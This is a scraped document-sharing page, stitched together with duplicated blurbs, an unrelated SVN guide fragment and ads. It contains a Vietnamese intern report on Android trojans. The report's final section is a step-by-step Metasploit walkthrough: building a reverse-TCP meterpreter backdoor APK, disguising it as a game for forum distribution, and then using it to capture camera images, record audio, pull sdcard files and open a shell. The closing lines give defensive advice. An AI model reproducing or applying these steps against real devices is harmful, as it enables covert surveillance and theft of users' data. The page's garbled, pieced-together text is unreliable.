Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact , tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Phần 1 : Nghiên cứu Kali Linux – các cơ chế tạo mã độc trên Kali Linux, từ đó xâm nhập thẻ Sd card, kích hoạt camera, ghi âm trên thiết bị, sau đó truyền dữ liệu về máy điều khiển từ xa
Android có thể dễ dàng được cài đặt trên máy ảo của VirtualBox, cả trên Windows lẫn Linux. Điều này cho phép người dùng có thể dễ dàng trải nghiệm hệ điều hành Android mà không cần phải tốn thêm chi phí gì khác.
Báo cao thực tập Athena tuần 3,4 :
Đề tài : Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.
I - MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION VÀ VIRTUALBOX
II – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:
III – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact , tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
Phần 1 : Nghiên cứu Kali Linux – các cơ chế tạo mã độc trên Kali Linux, từ đó xâm nhập thẻ Sd card, kích hoạt camera, ghi âm trên thiết bị, sau đó truyền dữ liệu về máy điều khiển từ xa
Android có thể dễ dàng được cài đặt trên máy ảo của VirtualBox, cả trên Windows lẫn Linux. Điều này cho phép người dùng có thể dễ dàng trải nghiệm hệ điều hành Android mà không cần phải tốn thêm chi phí gì khác.
Báo cao thực tập Athena tuần 3,4 :
Đề tài : Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.
I - MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION VÀ VIRTUALBOX
II – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:
III – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC:
Báo Cáo Thực Tập ATHENA Tuần 5 :Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.
KALI LINUX VÀ CÁCH CÀI ĐẶT MÁY ẢO KALI LINUX TRÊN VMWARE WORKSTATION
II – NGHIÊN CỨU MALWARE, TROJAN VÀ CƠ CHẾ TẠO MÃ ĐỘC TRÊN ANDROID
III – MÁY ẢO ANDROID VIRTUAL DEVICE – CÁCH TẠO MÁY ẢO QUA PHẦN MỀM ECLIPSE
IV – MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION THÔNG QUA VIRTUALBOX
V – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:
VI – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC
Huong dan su dung svn server (SVN subversion - SVN Hosting)Văn Nguyễn Trung
SVN SUBVERSION GIẢI QUYẾT ĐƯỢC VẤN ĐỀ GÌ?
Subversion là gì ?
Subversion (viết tắt SVN) là một hệ thống quản lý version (version control system - VCS) được giới thiệu vào năm 2000 bởi công ty CollabNet (http://subversion.tigris.org). Đây là hệ thống hỗ trợ làm việc theo nhóm rất hiệu quả.
Phần mềm:
Cho client: TortoiseSVN, Download:http://tortoisesvn.net/
Cho server: VisualSVN – Server Download: http://tortoisesvn.net/downloads.html
Các site cung cấp dịch vụ:
http://hostingviet.vn
http://code.google.com
http://sourceforge.net
SVN Subversion giải quyết được vấn đề gì?
Khi một nhóm làm việc trên cùng một project, việc nhiều người cùng chỉnh sửa nội dung của một file là điều không thể tránh khỏi. SVN Subversion cung cấp các chức năng để có thể thực hiện việc này một cách đơn giản và an toàn.
SVN Subversion được thiết kế với mục đích thay thế hệ thống quản lý phiên bản Concurrent Versioning System (CVS) đã cũ và có nhiều nhược điểm. Subversion có thể được sử dụng để quản lý bất cứ hệ thống phiên bản nào.
SVN Subversion là hệ thống quản lý source code tập trung (Centralized).
SVN Subversion là hệ thống quản lý phiên bản mạnh mẽ, hữu dụng, và linh hoạt.
SVN Subversion quản lý tập tin và thư mục theo thời gian.
SVN Subversion giống như một hệ thống file server mà các client có thể download và upload file một cách bình thường.
Điểm đặt biệt của SVN Subversion là nó lưu lại tất cả những gì thay đổi trên hệ thống file: file nào đã bị thay đổi lúc nào, thay đổi như thế nào, và ai đã thay đổi nó.
SVN Subversion cũng cho phép recover lại những version cũ một cách chính xác. Các chức năng này giúp cho việc làm việc nhóm trở nên hiệu quả và an toàn hơn rất nhiều.
Thông thường, client và server kết nối thông qua mạng LAN hoặc Internet. Client và server có thể cùng chạy trên một máy nếu SVN Subversion có nhiệm vụ theo vết lịch sử của dự án do các nhà phát triển phần mềm phát triển trong nội bộ.
SVN Subversion hỗ trợ khá nhiều giao thức để kết nối giữa client và server.
Ví dụ bạn có thể dùng các giao thức của ứng dụng web như http:// hoặc https://, hay các giao thức của svn như svn:// hoặc svn+ssh://, hoặc nếu phần mềm client và server cài chung trên 1 máy thì có thể dùng file://.
Việc cho phép server hỗ trợ giao thức nào phụ thuộc vào lúc cấu hình.
Cài đặt SVN Subversion (Client): tool dùng trên Client
Cài đặt VisualSVN(Server): tool dùng cho Server
Chi tiết cài đ
Báo Cáo Thực Tập ATHENA Tuần 5 :Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.
KALI LINUX VÀ CÁCH CÀI ĐẶT MÁY ẢO KALI LINUX TRÊN VMWARE WORKSTATION
II – NGHIÊN CỨU MALWARE, TROJAN VÀ CƠ CHẾ TẠO MÃ ĐỘC TRÊN ANDROID
III – MÁY ẢO ANDROID VIRTUAL DEVICE – CÁCH TẠO MÁY ẢO QUA PHẦN MỀM ECLIPSE
IV – MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION THÔNG QUA VIRTUALBOX
V – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:
VI – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC
Huong dan su dung svn server (SVN subversion - SVN Hosting)Văn Nguyễn Trung
SVN SUBVERSION GIẢI QUYẾT ĐƯỢC VẤN ĐỀ GÌ?
Subversion là gì ?
Subversion (viết tắt SVN) là một hệ thống quản lý version (version control system - VCS) được giới thiệu vào năm 2000 bởi công ty CollabNet (http://subversion.tigris.org). Đây là hệ thống hỗ trợ làm việc theo nhóm rất hiệu quả.
Phần mềm:
Cho client: TortoiseSVN, Download:http://tortoisesvn.net/
Cho server: VisualSVN – Server Download: http://tortoisesvn.net/downloads.html
Các site cung cấp dịch vụ:
http://hostingviet.vn
http://code.google.com
http://sourceforge.net
SVN Subversion giải quyết được vấn đề gì?
Khi một nhóm làm việc trên cùng một project, việc nhiều người cùng chỉnh sửa nội dung của một file là điều không thể tránh khỏi. SVN Subversion cung cấp các chức năng để có thể thực hiện việc này một cách đơn giản và an toàn.
SVN Subversion được thiết kế với mục đích thay thế hệ thống quản lý phiên bản Concurrent Versioning System (CVS) đã cũ và có nhiều nhược điểm. Subversion có thể được sử dụng để quản lý bất cứ hệ thống phiên bản nào.
SVN Subversion là hệ thống quản lý source code tập trung (Centralized).
SVN Subversion là hệ thống quản lý phiên bản mạnh mẽ, hữu dụng, và linh hoạt.
SVN Subversion quản lý tập tin và thư mục theo thời gian.
SVN Subversion giống như một hệ thống file server mà các client có thể download và upload file một cách bình thường.
Điểm đặt biệt của SVN Subversion là nó lưu lại tất cả những gì thay đổi trên hệ thống file: file nào đã bị thay đổi lúc nào, thay đổi như thế nào, và ai đã thay đổi nó.
SVN Subversion cũng cho phép recover lại những version cũ một cách chính xác. Các chức năng này giúp cho việc làm việc nhóm trở nên hiệu quả và an toàn hơn rất nhiều.
Thông thường, client và server kết nối thông qua mạng LAN hoặc Internet. Client và server có thể cùng chạy trên một máy nếu SVN Subversion có nhiệm vụ theo vết lịch sử của dự án do các nhà phát triển phần mềm phát triển trong nội bộ.
SVN Subversion hỗ trợ khá nhiều giao thức để kết nối giữa client và server.
Ví dụ bạn có thể dùng các giao thức của ứng dụng web như http:// hoặc https://, hay các giao thức của svn như svn:// hoặc svn+ssh://, hoặc nếu phần mềm client và server cài chung trên 1 máy thì có thể dùng file://.
Việc cho phép server hỗ trợ giao thức nào phụ thuộc vào lúc cấu hình.
Cài đặt SVN Subversion (Client): tool dùng trên Client
Cài đặt VisualSVN(Server): tool dùng cho Server
Chi tiết cài đ
Để xem full tài liệu Xin vui long liên hệ page để được hỗ trợ
:
https://www.facebook.com/garmentspace/
https://www.facebook.com/thuvienluanvan01
HOẶC
https://www.facebook.com/thuvienluanvan01
https://www.facebook.com/thuvienluanvan01
tai lieu tong hop, thu vien luan van, luan van tong hop, do an chuyen nganh
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
https://dienlanhbachkhoa.net.vn
Hotline/Zalo: 0338580000
Địa chỉ: Số 108 Trần Phú, Hà Đông, Hà Nội
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
Bao cao athena 2
1. TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÁO CÁO TUẦN
ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE
CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ
DỤNG ANDROID VÀ GỬI RA NGOÀI
CBHD: Võ Đỗ Thắng
SVTH: Nguyễn Đức Thái
Tp. HCM Ngày 29 Tháng 06 Năm 2014
2. Mục Lục
Nội dung: Nghiên cứu Kali Linux, Sử dụng Kali Linux để tấn công vào Android......................... 1
1. Nghiên cứu Kali Linux, các cơ chế tạo mã độc trên Kali Linux để xâm nhập vào máy
Android .................................................................................................................................................. 1
1.1. Tổng quan .............................................................................................................................. 1
1.2. Cải tiến của Kali Linux so với Backtrack. .......................................................................... 1
1.3. Cài đặt Kali Linux................................................................................................................. 2
1.3.1. Chuẩn bị......................................................................................................................... 2
1.3.2. Cài đặt. ........................................................................................................................... 2
1.4. Tạo mã độc trên Kali Linux để xâm nhập Android......................................................... 15
3. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 1
Nội dung: Nghiên cứu Kali Linux, Sử dụng Kali Linux để tấn công
vào Android.
1. Nghiên cứu Kali Linux, các cơ chế tạo mã độc trên Kali Linux
để xâm nhập vào máy Android
1.1. Tổng quan
Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để
kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux
là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng
sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã
công bố phiên bản mới của BackTrack có thên là Kali Linux (được xem như phiên bản
BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà
bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp.
1.2. Cải tiến của Kali Linux so với Backtrack.
Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu
trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có
được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập
nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan
trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói
của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu
trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem
xét hoặc thay đổi mã nguồn của các công cụ.
Tính tương thích kiến trúc
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến
trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta
có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.
Hỗ trợ mạng không dây tốt hơn
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính
là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay
USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá
mạng không dây.
Khả năng tùy biến cao
4. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 2
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối
với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như
GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều
hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta
đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ
dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không
phải cài lại mới hoàn toàn nữa
1.3. Cài đặt Kali Linux
1.3.1. Chuẩn bị.
File iso Kali Linux: http://www.kali.org/downloads/
Máy có cài sẵn Vmware.
1.3.2. Cài đặt.
Đầu tiên ta cần download Kali Linux tại link sau http://www.kali.org/downloads/.
Chọn phiên bản phù hợp tiến hành download. Ở đây chọn phiên bản dành cho
windowns 32 bit download bằng link trực tiếp. Sau khi có file iso ta tiến hành cài đặt
Kali Linux trên máy ảo.
Khởi động VMwarre, ở góc phải trên màn hình chọn File -> New Virtual
Machine....
5. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 3
Hình 12. Chon phương thức cái đặt.
Chọn Typical, nhấn Next để tiếp tục.
Hình 33. Tìm đường dẫn đến file iso Kali Linux.
Chọn Installer disc image file, nhấn Browse… tìm đường dẫn đến file iso của
Kali Linux sau đó nhấn Next để tiếp tục.
6. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 4
Hình 34. Chọn dung lượng đĩa.
Thiết đặt dung lượng tối đa dùng để cài đặt Kali Linux sau đó chọn Next.
Hình 35. Xác nhận cài Đặt.
Chọn Finish để xác nhận tiến hành cài đặt.
7. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 5
Hình 36. Cài đặt Kali Linux.
Tại đây ta chọn Graphical install => Enter để tiến hành cài đặt trực quan bằng
giao diện.
Hình 37. Chọn Ngôn Ngữ.
Tiến hành chọn lựa ngôn ngữ (ở đây chọn English), nhấn continue.
8. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 6
Hình 38. Chọn khu vực.
Lựa chọn khu vực ta chọn other => Continue.
Hình 39. Khu vực Asia.
Tiếp tục chọn khu vực là Asia => Continue.
9. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 7
Hình 20. Chọn quốc gia Viet Nam.
Chọn quốc gia là Viet Nam => Continue.
Hình 41. Chọn bảng mã.
Chọn bảng mã là United States – en_US.UTF. Bảng mã này gồm đầy đủ các ký
tự Latinh đồng thời hỗ trợ Tiếng Việt. Nhấn Continue để tiếp tục.
10. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 8
Hình 42. Chọn kiểu bàn phím.
Chọn kiểu bàn phím Ameican English => Continue.
Hình 43. Đặt Hostname.
Tiếp theo là thiết đặt mạng. Đặt tên Hostname là bắt buộc. Ta có thể đặt tên bất kỳ
nhưng không thể có khoảng trắng. Nhấn Continue để tiếp tục.
11. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 9
Hình 44. Đặt Domain name.
Có thể bỏ trống Domain name => Continue.
Hình 43. Đặt root password.
Điền hai lần Root password giống nhau (nhớ password đã đặt để sau này đăng
nhập) => Continue.
12. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 10
Hình 44. Tùy chọn ổ đĩa.
Tùy chọn ổ đĩa cài đặt. Ở đây ta chọn use entire disk -> continue.
Hình 45. Chọn ổ đĩa cài đặt.
Tiếp tục nhấn Continue.
13. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 11
Hình 46. Phương thức cài đặt ổ đĩa.
Chọn All file in one partion => Continue.
Hình 47. Xác nhận thông số cài đặt.
Kiểm tra thiết đặt thông tin ổ đĩa. Nếu có sai sót chọn Go Back để sửa đổi. Chọn
Continue tiếp tục.
14. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 12
Hình 50. Xác nhận định dạng ổ đĩa.
Chọn Yes để xác nhận thay đổi ổ đĩa => Continue để tiến trình bắt đầu copy file
và cài đặt Kali Linux.
Hình 51. Cài đặt bắt đầu.
15. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 13
Hình 52. Tìm kiếm cập nhật qua internet.
Ở đây nếu chọn Yes tiến trình sẽ kiểm tra có hay không bản cập nhật qua mạng.
Ta chọn No để nhanh chóng cài đặt (có thể cập nhật sau khi cài đặt xong).
Hình 53. Xác nhận cài đặt GRUD.
16. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 14
Tiếp theo tiến trình sẽ hỏi có cài đặt và sử dụng GRUB để khởi động không. Ta
chọn Yes => Continue.
Hình 54. Xác nhận cài đặt thành công.
Thông báo xác nhận Kali Linux Đã cài đặt xong. Ta chọn Continue tiến trình sẽ
thực hiện xoa một số file dư thừa sau khi cài đặt rồi khởi động lại.
17. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 15
Hình 55. Đăng nhập Kali Linux.
Sau khi khởi động xong ta nhập User là root va password được đặt ở trên để đăng
nhập. Như vậy là ta đã hoàn thành cài đặt xong Kali Linux.
1.4. Tạo mã độc trên Kali Linux để xâm nhập Android.
Trước khi tiến hành ta nên thiết lập phần Network như sau:
Vào VM => Settings... ở thanh lựa chọn của Vmware
18. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 16
Vào Network Adapter và chọn Bridged: connection directly to the physical
network
Vào Edit => Virtual Network Editor...
Trên phần Bridge (connect VMs directly to the external network) chọn adapter
của máy thật
19. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 17
Tiếp theo ta sẽ tiến hành xâm nhập và điều khiển Android bằng Kali Linux. Đầu
tiên ta cần tạo 1 file apk có chứa backdoor bằng cách:
Đầu tiên mở terminal và gõ dòng lệnh ifconfig để biêt thông tin ip của máy.
20. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 18
Sử dụng lệnh msfpayload android/meterpreter/reverse_tcp
lhost=192.168.240.132 lport=4444 R > /root/Desktop/App.apk để tạo backdoor. Với
192.168.240.132 là ip đã tìm được ở trên.
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một
Metasploit reverse tcp backdoor.
21. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 19
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng
cách gõ lệnh sau:
use exploit/multi/handler
set payload /meterpreter/reverse_tcp
set lhost 192.168.240.132 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set port 4444 – nhập port giống với port khi tạo payload ở trên.
exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Đến đây, vấn đề của chúng ta là làm sao để phân tán file chứa backdoor App.apk
đến các máy Android. Ta có thể ngụy trang file App.apk thành một ứng dụng, game va
tiến hành chia sẻ trên forum. Ở đây thử với một máy Galaxy Nexus One giả lập, tải về
App.apk, cài đặt:
22. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 20
Khởi động ứng dụng vậy là ta đã kết nối thành công tới máy Android này, ở
msfconsole sẽ như sau:
Để xem tất cả các lệnh hỗ trợ nhập help
23. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 21
Để xem thông tin về máy, nhập lệnh SysInfo
Xem thông tin card mạng nhập lệnh ipconfig:
Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở
danh sách camera ở phần trước. Ví dụ như sau:
24. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 22
File hình đã chụp từ camera của máy android là RbWBRryj.jpeg được lưu ở /root
của máy
Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Ta được file ghi âm
Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
25. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 23
Ví dụ ở đây, ta tải file App.apk trong thư mục sdcard.dùng lệnh download
App.apk
Và file này sẽ được tải về thư mục root của máy Kali
Nhập lệnh shell để điều khiển máy trong chế độ shell. Tai đây ta nhập lệnh ls –l để
xem các file và quyền hạn cần để sử dụng.
26. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 24
Như các bạn cũng thấy thư muc data cần quyền hạn cao nhất để tiến hành sử dụng.
Mà các dữ liệu quan trọng như Contacts, SMS, tài khoản đồng bộ Google… đều được
lưu tại đây. Vi thế ta chỉ có thể lấy cắp các thông tin này nếu như máy Android bị xâm
nhập đã được root (hack chiếm quyền điều khiển cao nhất).
Kết luận
Như vậy, ta đã tìm hiểu về Kali Linux, các cải tiến của nó so với BackTrack. Cách
sử dụng Metasploit của Kali Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy
Android về máy.
Sau khi thử nghiệm cách tấn công này, ta rút ra không nên tải về và chạy file lạ
trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên, không tiến
hành root may nếu không thực sự cần thiết vì chỉ cần máy bị nhiễm backdoor là ta đã có
thể xem như có toàn quyền kiểm soát máy Android đó.